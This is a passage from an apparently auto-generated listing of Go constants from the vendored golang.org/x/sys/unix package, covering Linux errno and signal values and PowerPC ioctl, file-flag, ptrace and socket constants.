syscall.Errno(0xa3) constant EL2HLT (line 577) | EL2HLT = syscall.Errno(0x2c) constant EL2NSYNC (line 578) | EL2NSYNC = syscall.Errno(0x26) constant EL3HLT (line 579) | EL3HLT = syscall.Errno(0x27) constant EL3RST (line 580) | EL3RST = syscall.Errno(0x28) constant ELIBACC (line 581) | ELIBACC = syscall.Errno(0x53) constant ELIBBAD (line 582) | ELIBBAD = syscall.Errno(0x54) constant ELIBEXEC (line 583) | ELIBEXEC = syscall.Errno(0x57) constant ELIBMAX (line 584) | ELIBMAX = syscall.Errno(0x56) constant ELIBSCN (line 585) | ELIBSCN = syscall.Errno(0x55) constant ELNRNG (line 586) | ELNRNG = syscall.Errno(0x29) constant ELOOP (line 587) | ELOOP = syscall.Errno(0x5a) constant EMEDIUMTYPE (line 588) | EMEDIUMTYPE = syscall.Errno(0xa0) constant EMSGSIZE (line 589) | EMSGSIZE = syscall.Errno(0x61) constant EMULTIHOP (line 590) | EMULTIHOP = syscall.Errno(0x4a) constant ENAMETOOLONG (line 591) | ENAMETOOLONG = syscall.Errno(0x4e) constant ENAVAIL (line 592) | ENAVAIL = syscall.Errno(0x8a) constant ENETDOWN (line 593) | ENETDOWN = syscall.Errno(0x7f) constant ENETRESET (line 594) | ENETRESET = syscall.Errno(0x81) constant ENETUNREACH (line 595) | ENETUNREACH = syscall.Errno(0x80) constant ENOANO (line 596) | ENOANO = syscall.Errno(0x35) constant ENOBUFS (line 597) | ENOBUFS = syscall.Errno(0x84) constant ENOCSI (line 598) | ENOCSI = syscall.Errno(0x2b) constant ENODATA (line 599) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 600) | ENOKEY = syscall.Errno(0xa1) constant ENOLCK (line 601) | ENOLCK = syscall.Errno(0x2e) constant ENOLINK (line 602) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 603) | ENOMEDIUM = syscall.Errno(0x9f) constant ENOMSG (line 604) | ENOMSG = syscall.Errno(0x23) constant ENONET (line 605) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 606) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 607) | ENOPROTOOPT = syscall.Errno(0x63) constant ENOSR (line 608) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 609) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 610) | ENOSYS = syscall.Errno(0x59) constant ENOTCONN (line 611) | ENOTCONN = syscall.Errno(0x86) constant ENOTEMPTY (line 612) | ENOTEMPTY = syscall.Errno(0x5d) constant ENOTNAM (line 613) | ENOTNAM = syscall.Errno(0x89) constant ENOTRECOVERABLE (line 614) | ENOTRECOVERABLE = syscall.Errno(0xa6) constant ENOTSOCK (line 615) | ENOTSOCK = syscall.Errno(0x5f) constant ENOTSUP (line 616) | ENOTSUP = syscall.Errno(0x7a) constant ENOTUNIQ (line 617) | ENOTUNIQ = syscall.Errno(0x50) constant EOPNOTSUPP (line 618) | EOPNOTSUPP = syscall.Errno(0x7a) constant EOVERFLOW (line 619) | EOVERFLOW = syscall.Errno(0x4f) constant EOWNERDEAD (line 620) | EOWNERDEAD = syscall.Errno(0xa5) constant EPFNOSUPPORT (line 621) | EPFNOSUPPORT = syscall.Errno(0x7b) constant EPROTO (line 622) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 623) | EPROTONOSUPPORT = syscall.Errno(0x78) constant EPROTOTYPE (line 624) | EPROTOTYPE = syscall.Errno(0x62) constant EREMCHG (line 625) | EREMCHG = syscall.Errno(0x52) constant EREMDEV (line 626) | EREMDEV = syscall.Errno(0x8e) constant EREMOTE (line 627) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 628) | EREMOTEIO = syscall.Errno(0x8c) constant ERESTART (line 629) | ERESTART = syscall.Errno(0x5b) constant ERFKILL (line 630) | ERFKILL = syscall.Errno(0xa7) constant ESHUTDOWN (line 631) | ESHUTDOWN = syscall.Errno(0x8f) constant ESOCKTNOSUPPORT (line 632) | ESOCKTNOSUPPORT = syscall.Errno(0x79) constant ESRMNT (line 633) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 634) | ESTALE = syscall.Errno(0x97) constant ESTRPIPE (line 635) | ESTRPIPE = syscall.Errno(0x5c) constant ETIME (line 636) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 637) | ETIMEDOUT = syscall.Errno(0x91) constant ETOOMANYREFS (line 638) | ETOOMANYREFS = syscall.Errno(0x90) constant EUCLEAN (line 639) | EUCLEAN = syscall.Errno(0x87) constant EUNATCH (line 640) | EUNATCH = syscall.Errno(0x2a) constant EUSERS (line 641) | EUSERS = syscall.Errno(0x5e) constant EXFULL (line 642) | EXFULL = syscall.Errno(0x34) constant SIGBUS (line 647) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 648) | SIGCHLD = syscall.Signal(0x12) constant SIGCLD (line 649) | SIGCLD = syscall.Signal(0x12) constant SIGCONT (line 650) | SIGCONT = syscall.Signal(0x19) constant SIGEMT (line 651) | SIGEMT = syscall.Signal(0x7) constant SIGIO (line 652) | SIGIO = syscall.Signal(0x16) constant SIGPOLL (line 653) | SIGPOLL = syscall.Signal(0x16) constant SIGPROF (line 654) | SIGPROF = syscall.Signal(0x1d) constant SIGPWR (line 655) | SIGPWR = syscall.Signal(0x13) constant SIGSTOP (line 656) | SIGSTOP = syscall.Signal(0x17) constant SIGSYS (line 657) | SIGSYS = syscall.Signal(0xc) constant SIGTSTP (line 658) | SIGTSTP = syscall.Signal(0x18) constant SIGTTIN (line 659) | SIGTTIN = syscall.Signal(0x1a) constant SIGTTOU (line 660) | SIGTTOU = syscall.Signal(0x1b) constant SIGURG (line 661) | SIGURG = syscall.Signal(0x15) constant SIGUSR1 (line 662) | SIGUSR1 = syscall.Signal(0x10) constant SIGUSR2 (line 663) | SIGUSR2 = syscall.Signal(0x11) constant SIGVTALRM (line 664) | SIGVTALRM = syscall.Signal(0x1c) constant SIGWINCH (line 665) | SIGWINCH = syscall.Signal(0x14) constant SIGXCPU (line 666) | SIGXCPU = syscall.Signal(0x1e) constant SIGXFSZ (line 667) | SIGXFSZ = syscall.Signal(0x1f) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_ppc.go constant B1000000 (line 14) | B1000000 = 0x17 constant B115200 (line 15) | B115200 = 0x11 constant B1152000 (line 16) | B1152000 = 0x18 constant B1500000 (line 17) | B1500000 = 0x19 constant B2000000 (line 18) | B2000000 = 0x1a constant B230400 (line 19) | B230400 = 0x12 constant B2500000 (line 20) | B2500000 = 0x1b constant B3000000 (line 21) | B3000000 = 0x1c constant B3500000 (line 22) | B3500000 = 0x1d constant B4000000 (line 23) | B4000000 = 0x1e constant B460800 (line 24) | B460800 = 0x13 constant B500000 (line 25) | B500000 = 0x14 constant B57600 (line 26) | B57600 = 0x10 constant B576000 (line 27) | B576000 = 0x15 constant B921600 (line 28) | B921600 = 0x16 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x2000127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x40041270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x80041271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x20001277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x2000127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x20001261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x20001265 constant BLKFRASET (line 36) | BLKFRASET = 0x20001264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x40081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x20001260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x40041272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x20001278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x20001279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x2000127b constant BLKRAGET (line 43) | BLKRAGET = 0x20001263 constant BLKRASET (line 44) | BLKRASET = 0x20001262 constant BLKROGET (line 45) | BLKROGET = 0x2000125e constant BLKROSET (line 46) | BLKROSET = 0x2000125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x2000127e constant BLKRRPART (line 48) | BLKRRPART = 0x2000125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x2000127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x20001267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x20001266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x20001268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x2000127f constant BOTHER (line 54) | BOTHER = 0x1f constant BS1 (line 55) | BS1 = 0x8000 constant BSDLY (line 56) | BSDLY = 0x8000 constant CBAUD (line 57) | CBAUD = 0xff constant CBAUDEX (line 58) | CBAUDEX = 0x0 constant CIBAUD (line 59) | CIBAUD = 0xff0000 constant CLOCAL (line 60) | CLOCAL = 0x8000 constant CR1 (line 61) | CR1 = 0x1000 constant CR2 (line 62) | CR2 = 0x2000 constant CR3 (line 63) | CR3 = 0x3000 constant CRDLY (line 64) | CRDLY = 0x3000 constant CREAD (line 65) | CREAD = 0x800 constant CS6 (line 66) | CS6 = 0x100 constant CS7 (line 67) | CS7 = 0x200 constant CS8 (line 68) | CS8 = 0x300 constant CSIZE (line 69) | CSIZE = 0x300 constant CSTOPB (line 70) | CSTOPB = 0x400 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x41484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x40104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x40 constant ECHOE (line 74) | ECHOE = 0x2 constant ECHOK (line 75) | ECHOK = 0x4 constant ECHOKE (line 76) | ECHOKE = 0x1 constant ECHONL (line 77) | ECHONL = 0x10 constant ECHOPRT (line 78) | ECHOPRT = 0x20 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x800 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000000 constant FF1 (line 83) | FF1 = 0x4000 constant FFDLY (line 84) | FFDLY = 0x4000 constant FICLONE (line 85) | FICLONE = 0x80049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x8020940d constant FLUSHO (line 87) | FLUSHO = 0x800000 constant FS_IOC_ENABLE_VERITY (line 88) | FS_IOC_ENABLE_VERITY = 0x80806685 constant FS_IOC_GETFLAGS (line 89) | FS_IOC_GETFLAGS = 0x40046601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 90) | FS_IOC_GET_ENCRYPTION_NONCE = 0x4010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 91) | FS_IOC_GET_ENCRYPTION_POLICY = 0x800c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 92) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x80106614 constant FS_IOC_SETFLAGS (line 93) | FS_IOC_SETFLAGS = 0x80046602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 94) | FS_IOC_SET_ENCRYPTION_POLICY = 0x400c6613 constant F_GETLK (line 95) | F_GETLK = 0xc constant F_GETLK64 (line 96) | F_GETLK64 = 0xc constant F_GETOWN (line 97) | F_GETOWN = 0x9 constant F_RDLCK (line 98) | F_RDLCK = 0x0 constant F_SETLK (line 99) | F_SETLK = 0xd constant F_SETLK64 (line 100) | F_SETLK64 = 0xd constant F_SETLKW (line 101) | F_SETLKW = 0xe constant F_SETLKW64 (line 102) | F_SETLKW64 = 0xe constant F_SETOWN (line 103) | F_SETOWN = 0x8 constant F_UNLCK (line 104) | F_UNLCK = 0x2 constant F_WRLCK (line 105) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 106) | HIDIOCGRAWINFO = 0x40084803 constant HIDIOCGRDESC (line 107) | HIDIOCGRDESC = 0x50044802 constant HIDIOCGRDESCSIZE (line 108) | HIDIOCGRDESCSIZE = 0x40044801 constant HUPCL (line 109) | HUPCL = 0x4000 constant ICANON (line 110) | ICANON = 0x100 constant IEXTEN (line 111) | IEXTEN = 0x400 constant IN_CLOEXEC (line 112) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 113) | IN_NONBLOCK = 0x800 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 114) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x200007b9 constant ISIG (line 115) | ISIG = 0x80 constant IUCLC (line 116) | IUCLC = 0x1000 constant IXOFF (line 117) | IXOFF = 0x400 constant IXON (line 118) | IXON = 0x200 constant MAP_ANON (line 119) | MAP_ANON = 0x20 constant MAP_ANONYMOUS (line 120) | MAP_ANONYMOUS = 0x20 constant MAP_DENYWRITE (line 121) | MAP_DENYWRITE = 0x800 constant MAP_EXECUTABLE (line 122) | MAP_EXECUTABLE = 0x1000 constant MAP_GROWSDOWN (line 123) | MAP_GROWSDOWN = 0x100 constant MAP_HUGETLB (line 124) | MAP_HUGETLB = 0x40000 constant MAP_LOCKED (line 125) | MAP_LOCKED = 0x80 constant MAP_NONBLOCK (line 126) | MAP_NONBLOCK = 0x10000 constant MAP_NORESERVE (line 127) | MAP_NORESERVE = 0x40 constant MAP_POPULATE (line 128) | MAP_POPULATE = 0x8000 constant MAP_STACK (line 129) | MAP_STACK = 0x20000 constant MAP_SYNC (line 130) | MAP_SYNC = 0x80000 constant MCL_CURRENT (line 131) | MCL_CURRENT = 0x2000 constant MCL_FUTURE (line 132) | MCL_FUTURE = 0x4000 constant MCL_ONFAULT (line 133) | MCL_ONFAULT = 0x8000 constant MEMERASE (line 134) | MEMERASE = 0x80084d02 constant MEMERASE64 (line 135) | MEMERASE64 = 0x80104d14 constant MEMGETBADBLOCK (line 136) | MEMGETBADBLOCK = 0x80084d0b constant MEMGETINFO (line 137) | MEMGETINFO = 0x40204d01 constant MEMGETOOBSEL (line 138) | MEMGETOOBSEL = 0x40c84d0a constant MEMGETREGIONCOUNT (line 139) | MEMGETREGIONCOUNT = 0x40044d07 constant MEMISLOCKED (line 140) | MEMISLOCKED = 0x40084d17 constant MEMLOCK (line 141) | MEMLOCK = 0x80084d05 constant MEMREAD (line 142) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 143) | MEMREADOOB = 0xc00c4d04 constant MEMSETBADBLOCK (line 144) | MEMSETBADBLOCK = 0x80084d0c constant MEMUNLOCK (line 145) | MEMUNLOCK = 0x80084d06 constant MEMWRITEOOB (line 146) | MEMWRITEOOB = 0xc00c4d03 constant MTDFILEMODE (line 147) | MTDFILEMODE = 0x20004d13 constant NFDBITS (line 148) | NFDBITS = 0x20 constant NL2 (line 149) | NL2 = 0x200 constant NL3 (line 150) | NL3 = 0x300 constant NLDLY (line 151) | NLDLY = 0x300 constant NOFLSH (line 152) | NOFLSH = 0x80000000 constant NS_GET_NSTYPE (line 153) | NS_GET_NSTYPE = 0x2000b703 constant NS_GET_OWNER_UID (line 154) | NS_GET_OWNER_UID = 0x2000b704 constant NS_GET_PARENT (line 155) | NS_GET_PARENT = 0x2000b702 constant NS_GET_USERNS (line 156) | NS_GET_USERNS = 0x2000b701 constant OLCUC (line 157) | OLCUC = 0x4 constant ONLCR (line 158) | ONLCR = 0x2 constant OTPERASE (line 159) | OTPERASE = 0x800c4d19 constant OTPGETREGIONCOUNT (line 160) | OTPGETREGIONCOUNT = 0x80044d0e constant OTPGETREGIONINFO (line 161) | OTPGETREGIONINFO = 0x800c4d0f constant OTPLOCK (line 162) | OTPLOCK = 0x400c4d10 constant OTPSELECT (line 163) | OTPSELECT = 0x40044d0d constant O_APPEND (line 164) | O_APPEND = 0x400 constant O_ASYNC (line 165) | O_ASYNC = 0x2000 constant O_CLOEXEC (line 166) | O_CLOEXEC = 0x80000 constant O_CREAT (line 167) | O_CREAT = 0x40 constant O_DIRECT (line 168) | O_DIRECT = 0x20000 constant O_DIRECTORY (line 169) | O_DIRECTORY = 0x4000 constant O_DSYNC (line 170) | O_DSYNC = 0x1000 constant O_EXCL (line 171) | O_EXCL = 0x80 constant O_FSYNC (line 172) | O_FSYNC = 0x101000 constant O_LARGEFILE (line 173) | O_LARGEFILE = 0x10000 constant O_NDELAY (line 174) | O_NDELAY = 0x800 constant O_NOATIME (line 175) | O_NOATIME = 0x40000 constant O_NOCTTY (line 176) | O_NOCTTY = 0x100 constant O_NOFOLLOW (line 177) | O_NOFOLLOW = 0x8000 constant O_NONBLOCK (line 178) | O_NONBLOCK = 0x800 constant O_PATH (line 179) | O_PATH = 0x200000 constant O_RSYNC (line 180) | O_RSYNC = 0x101000 constant O_SYNC (line 181) | O_SYNC = 0x101000 constant O_TMPFILE (line 182) | O_TMPFILE = 0x404000 constant O_TRUNC (line 183) | O_TRUNC = 0x200 constant PARENB (line 184) | PARENB = 0x1000 constant PARODD (line 185) | PARODD = 0x2000 constant PENDIN (line 186) | PENDIN = 0x20000000 constant PERF_EVENT_IOC_DISABLE (line 187) | PERF_EVENT_IOC_DISABLE = 0x20002401 constant PERF_EVENT_IOC_ENABLE (line 188) | PERF_EVENT_IOC_ENABLE = 0x20002400 constant PERF_EVENT_IOC_ID (line 189) | PERF_EVENT_IOC_ID = 0x40042407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 190) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x8004240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 191) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x80042409 constant PERF_EVENT_IOC_PERIOD (line 192) | PERF_EVENT_IOC_PERIOD = 0x80082404 constant PERF_EVENT_IOC_QUERY_BPF (line 193) | PERF_EVENT_IOC_QUERY_BPF = 0xc004240a constant PERF_EVENT_IOC_REFRESH (line 194) | PERF_EVENT_IOC_REFRESH = 0x20002402 constant PERF_EVENT_IOC_RESET (line 195) | PERF_EVENT_IOC_RESET = 0x20002403 constant PERF_EVENT_IOC_SET_BPF (line 196) | PERF_EVENT_IOC_SET_BPF = 0x80042408 constant PERF_EVENT_IOC_SET_FILTER (line 197) | PERF_EVENT_IOC_SET_FILTER = 0x80042406 constant PERF_EVENT_IOC_SET_OUTPUT (line 198) | PERF_EVENT_IOC_SET_OUTPUT = 0x20002405 constant PPPIOCATTACH (line 199) | PPPIOCATTACH = 0x8004743d constant PPPIOCATTCHAN (line 200) | PPPIOCATTCHAN = 0x80047438 constant PPPIOCBRIDGECHAN (line 201) | PPPIOCBRIDGECHAN = 0x80047435 constant PPPIOCCONNECT (line 202) | PPPIOCCONNECT = 0x8004743a constant PPPIOCDETACH (line 203) | PPPIOCDETACH = 0x8004743c constant PPPIOCDISCONN (line 204) | PPPIOCDISCONN = 0x20007439 constant PPPIOCGASYNCMAP (line 205) | PPPIOCGASYNCMAP = 0x40047458 constant PPPIOCGCHAN (line 206) | PPPIOCGCHAN = 0x40047437 constant PPPIOCGDEBUG (line 207) | PPPIOCGDEBUG = 0x40047441 constant PPPIOCGFLAGS (line 208) | PPPIOCGFLAGS = 0x4004745a constant PPPIOCGIDLE (line 209) | PPPIOCGIDLE = 0x4008743f constant PPPIOCGIDLE32 (line 210) | PPPIOCGIDLE32 = 0x4008743f constant PPPIOCGIDLE64 (line 211) | PPPIOCGIDLE64 = 0x4010743f constant PPPIOCGL2TPSTATS (line 212) | PPPIOCGL2TPSTATS = 0x40487436 constant PPPIOCGMRU (line 213) | PPPIOCGMRU = 0x40047453 constant PPPIOCGRASYNCMAP (line 214) | PPPIOCGRASYNCMAP = 0x40047455 constant PPPIOCGUNIT (line 215) | PPPIOCGUNIT = 0x40047456 constant PPPIOCGXASYNCMAP (line 216) | PPPIOCGXASYNCMAP = 0x40207450 constant PPPIOCSACTIVE (line 217) | PPPIOCSACTIVE = 0x80087446 constant PPPIOCSASYNCMAP (line 218) | PPPIOCSASYNCMAP = 0x80047457 constant PPPIOCSCOMPRESS (line 219) | PPPIOCSCOMPRESS = 0x800c744d constant PPPIOCSDEBUG (line 220) | PPPIOCSDEBUG = 0x80047440 constant PPPIOCSFLAGS (line 221) | PPPIOCSFLAGS = 0x80047459 constant PPPIOCSMAXCID (line 222) | PPPIOCSMAXCID = 0x80047451 constant PPPIOCSMRRU (line 223) | PPPIOCSMRRU = 0x8004743b constant PPPIOCSMRU (line 224) | PPPIOCSMRU = 0x80047452 constant PPPIOCSNPMODE (line 225) | PPPIOCSNPMODE = 0x8008744b constant PPPIOCSPASS (line 226) | PPPIOCSPASS = 0x80087447 constant PPPIOCSRASYNCMAP (line 227) | PPPIOCSRASYNCMAP = 0x80047454 constant PPPIOCSXASYNCMAP (line 228) | PPPIOCSXASYNCMAP = 0x8020744f constant PPPIOCUNBRIDGECHAN (line 229) | PPPIOCUNBRIDGECHAN = 0x20007434 constant PPPIOCXFERUNIT (line 230) | PPPIOCXFERUNIT = 0x2000744e constant PROT_SAO (line 231) | PROT_SAO = 0x10 constant PR_SET_PTRACER_ANY (line 232) | PR_SET_PTRACER_ANY = 0xffffffff constant PTRACE_GETEVRREGS (line 233) | PTRACE_GETEVRREGS = 0x14 constant PTRACE_GETFPREGS (line 234) | PTRACE_GETFPREGS = 0xe constant PTRACE_GETREGS64 (line 235) | PTRACE_GETREGS64 = 0x16 constant PTRACE_GETVRREGS (line 236) | PTRACE_GETVRREGS = 0x12 constant PTRACE_GETVSRREGS (line 237) | PTRACE_GETVSRREGS = 0x1b constant PTRACE_GET_DEBUGREG (line 238) | PTRACE_GET_DEBUGREG = 0x19 constant PTRACE_SETEVRREGS (line 239) | PTRACE_SETEVRREGS = 0x15 constant PTRACE_SETFPREGS (line 240) | PTRACE_SETFPREGS = 0xf constant PTRACE_SETREGS64 (line 241) | PTRACE_SETREGS64 = 0x17 constant PTRACE_SETVRREGS (line 242) | PTRACE_SETVRREGS = 0x13 constant PTRACE_SETVSRREGS (line 243) | PTRACE_SETVSRREGS = 0x1c constant PTRACE_SET_DEBUGREG (line 244) | PTRACE_SET_DEBUGREG = 0x1a constant PTRACE_SINGLEBLOCK (line 245) | PTRACE_SINGLEBLOCK = 0x100 constant PTRACE_SYSEMU (line 246) | PTRACE_SYSEMU = 0x1d constant PTRACE_SYSEMU_SINGLESTEP (line 247) | PTRACE_SYSEMU_SINGLESTEP = 0x1e constant PT_CCR (line 248) | PT_CCR = 0x26 constant PT_CTR (line 249) | PT_CTR = 0x23 constant PT_DAR (line 250) | PT_DAR = 0x29 constant PT_DSCR (line 251) | PT_DSCR = 0x2c constant PT_DSISR (line 252) | PT_DSISR = 0x2a constant PT_FPR0 (line 253) | PT_FPR0 = 0x30 constant PT_FPR31 (line 254) | PT_FPR31 = 0x6e constant PT_FPSCR (line 255) | PT_FPSCR = 0x71 constant PT_LNK (line 256) | PT_LNK = 0x24 constant PT_MQ (line 257) | PT_MQ = 0x27 constant PT_MSR (line 258) | PT_MSR = 0x21 constant PT_NIP (line 259) | PT_NIP = 0x20 constant PT_ORIG_R3 (line 260) | PT_ORIG_R3 = 0x22 constant PT_R0 (line 261) | PT_R0 = 0x0 constant PT_R1 (line 262) | PT_R1 = 0x1 constant PT_R10 (line 263) | PT_R10 = 0xa constant PT_R11 (line 264) | PT_R11 = 0xb constant PT_R12 (line 265) | PT_R12 = 0xc constant PT_R13 (line 266) | PT_R13 = 0xd constant PT_R14 (line 267) | PT_R14 = 0xe constant PT_R15 (line 268) | PT_R15 = 0xf constant PT_R16 (line 269) | PT_R16 = 0x10 constant PT_R17 (line 270) | PT_R17 = 0x11 constant PT_R18 (line 271) | PT_R18 = 0x12 constant PT_R19 (line 272) | PT_R19 = 0x13 constant PT_R2 (line 273) | PT_R2 = 0x2 constant PT_R20 (line 274) | PT_R20 = 0x14 constant PT_R21 (line 275) | PT_R21 = 0x15 constant PT_R22 (line 276) | PT_R22 = 0x16 constant PT_R23 (line 277) | PT_R23 = 0x17 constant PT_R24 (line 278) | PT_R24 = 0x18 constant PT_R25 (line 279) | PT_R25 = 0x19 constant PT_R26 (line 280) | PT_R26 = 0x1a constant PT_R27 (line 281) | PT_R27 = 0x1b constant PT_R28 (line 282) | PT_R28 = 0x1c constant PT_R29 (line 283) | PT_R29 = 0x1d constant PT_R3 (line 284) | PT_R3 = 0x3 constant PT_R30 (line 285) | PT_R30 = 0x1e constant PT_R31 (line 286) | PT_R31 = 0x1f constant PT_R4 (line 287) | PT_R4 = 0x4 constant PT_R5 (line 288) | PT_R5 = 0x5 constant PT_R6 (line 289) | PT_R6 = 0x6 constant PT_R7 (line 290) | PT_R7 = 0x7 constant PT_R8 (line 291) | PT_R8 = 0x8 constant PT_R9 (line 292) | PT_R9 = 0x9 constant PT_REGS_COUNT (line 293) | PT_REGS_COUNT = 0x2c constant PT_RESULT (line 294) | PT_RESULT = 0x2b constant PT_TRAP (line 295) | PT_TRAP = 0x28 constant PT_XER (line 296) | PT_XER = 0x25 constant RLIMIT_AS (line 297) | RLIMIT_AS = 0x9 constant RLIMIT_MEMLOCK (line 298) | RLIMIT_MEMLOCK = 0x8 constant RLIMIT_NOFILE (line 299) | RLIMIT_NOFILE = 0x7 constant RLIMIT_NPROC (line 300) | RLIMIT_NPROC = 0x6 constant RLIMIT_RSS (line 301) | RLIMIT_RSS = 0x5 constant RNDADDENTROPY (line 302) | RNDADDENTROPY = 0x80085203 constant RNDADDTOENTCNT (line 303) | RNDADDTOENTCNT = 0x80045201 constant RNDCLEARPOOL (line 304) | RNDCLEARPOOL = 0x20005206 constant RNDGETENTCNT (line 305) | RNDGETENTCNT = 0x40045200 constant RNDGETPOOL (line 306) | RNDGETPOOL = 0x40085202 constant RNDRESEEDCRNG (line 307) | RNDRESEEDCRNG = 0x20005207 constant RNDZAPENTCNT (line 308) | RNDZAPENTCNT = 0x20005204 constant RTC_AIE_OFF (line 309) | RTC_AIE_OFF = 0x20007002 constant RTC_AIE_ON (line 310) | RTC_AIE_ON = 0x20007001 constant RTC_ALM_READ (line 311) | RTC_ALM_READ = 0x40247008 constant RTC_ALM_SET (line 312) | RTC_ALM_SET = 0x80247007 constant RTC_EPOCH_READ (line 313) | RTC_EPOCH_READ = 0x4004700d constant RTC_EPOCH_SET (line 314) | RTC_EPOCH_SET = 0x8004700e constant RTC_IRQP_READ (line 315) | RTC_IRQP_READ = 0x4004700b constant RTC_IRQP_SET (line 316) | RTC_IRQP_SET = 0x8004700c constant RTC_PARAM_GET (line 317) | RTC_PARAM_GET = 0x80187013 constant RTC_PARAM_SET (line 318) | RTC_PARAM_SET = 0x80187014 constant RTC_PIE_OFF (line 319) | RTC_PIE_OFF = 0x20007006 constant RTC_PIE_ON (line 320) | RTC_PIE_ON = 0x20007005 constant RTC_PLL_GET (line 321) | RTC_PLL_GET = 0x401c7011 constant RTC_PLL_SET (line 322) | RTC_PLL_SET = 0x801c7012 constant RTC_RD_TIME (line 323) | RTC_RD_TIME = 0x40247009 constant RTC_SET_TIME (line 324) | RTC_SET_TIME = 0x8024700a constant RTC_UIE_OFF (line 325) | RTC_UIE_OFF = 0x20007004 constant RTC_UIE_ON (line 326) | RTC_UIE_ON = 0x20007003 constant RTC_VL_CLR (line 327) | RTC_VL_CLR = 0x20007014 constant RTC_VL_READ (line 328) | RTC_VL_READ = 0x40047013 constant RTC_WIE_OFF (line 329) | RTC_WIE_OFF = 0x20007010 constant RTC_WIE_ON (line 330) | RTC_WIE_ON = 0x2000700f constant RTC_WKALM_RD (line 331) | RTC_WKALM_RD = 0x40287010 constant RTC_WKALM_SET (line 332) | RTC_WKALM_SET = 0x8028700f constant SCM_TIMESTAMPING (line 333) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 334) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 335) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 336) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 337) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 338) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 339) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x80182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 340) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x80082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 341) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x80082104 constant SFD_CLOEXEC (line 342) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 343) | SFD_NONBLOCK = 0x800 constant SIOCATMARK (line 344) | SIOCATMARK = 0x8905 constant SIOCGPGRP (line 345) | SIOCGPGRP = 0x8904 constant SIOCGSTAMPNS_NEW (line 346) | SIOCGSTAMPNS_NEW = 0x40108907 constant SIOCGSTAMP_NEW (line 347) | SIOCGSTAMP_NEW = 0x40108906 constant SIOCINQ (line 348) | SIOCINQ = 0x4004667f constant SIOCOUTQ (line 349) | SIOCOUTQ = 0x40047473 constant SIOCSPGRP (line 350) | SIOCSPGRP = 0x8902 constant SOCK_CLOEXEC (line 351) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 352) | SOCK_DGRAM = 0x2 constant SOCK_NONBLOCK (line 353) | SOCK_NONBLOCK = 0x800 constant SOCK_STREAM (line 354) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 355) | SOL_SOCKET = 0x1 constant SO_ACCEPTCONN (line 356) | SO_ACCEPTCONN = 0x1e constant SO_ATTACH_BPF (line 357) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 358) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 359) | 